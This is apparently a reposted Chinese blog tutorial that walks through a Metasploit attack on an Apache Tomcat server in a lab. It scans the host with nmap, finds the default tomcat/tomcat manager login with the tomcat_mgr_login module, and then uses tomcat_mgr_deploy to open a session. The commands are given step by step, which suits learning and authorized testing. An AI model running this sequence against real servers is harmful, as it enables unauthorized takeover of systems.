博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
使用msf对tomcat测试
阅读量:6444 次
发布时间:2019-06-23

本文共 800 字,大约阅读时间需要 2 分钟。

1.1 使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。

1.2 在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放8081端口并且运行着ApacheTomcat/CoyoteJSP engine1.1。
1.3 在终端中输入命令“msfconsole”,启动MSF终端。
1.4 在终端下输入命令“search tomcat”, 搜索tomcat的相关工具和攻击载荷。
1.5 在终端输入“use auxiliary/scanner/http/tomcat_mgr_login”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。
1.6 在终端下输入“set RHOSTS 192.168.1.3”,设置攻击目标主机IP。
1.7 在终端下输入“set RPORT 8180”,设置攻击目标主机端口号。
1.8 在终端下输入“exploit”, 实施攻击。获得用户名tomcat,密码tomcat。
1.9 在终端下输入“use exploit/multi/http/tomcat_mgr_deploy”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。
1.10 在终端下输入“set RHOST 192.168.1.3”,设置攻击的目标主机IP。
1.11 在终端下输入“set RPORT 8180”,设置攻击目标主机端口号。
1.12 在终端下输入“set username tomcat”,设置攻击时使用的登录账号tomcat。
1.13 在终端下输入“set password tomcat”,设置攻击时使用的密码tomcat。
1.14 在终端下输入“exploit”,开始攻击,建立会话。

转载于:https://www.cnblogs.com/NBeveryday/p/9557584.html

你可能感兴趣的文章
Zabbix实现微信平台报警----基于zabbix3.0.4
查看>>
android 安全讲座第二层 使用AndBug调试Android Java Bytecode
查看>>
css3 Gradients 线性渐变
查看>>
ucfirst() 函数
查看>>
bootstrap-导航条层次的导航
查看>>
git rm使用
查看>>
xss***代码
查看>>
Python学习网站
查看>>
mybatis基础(一)
查看>>
Python的Django框架中的Context使用
查看>>
我的友情链接
查看>>
linux常用命令
查看>>
Docker在Windows系统下的安装及简单使用介绍
查看>>
CentOS用yum安装X Window
查看>>
gpfs 修改 副本数
查看>>
Ubuntu16.4安装Wordpress
查看>>
模块和包
查看>>
socket编程总结
查看>>
逻辑回归模型(LR)
查看>>
[读书笔记]JavaScript 闭包(Closures)
查看>>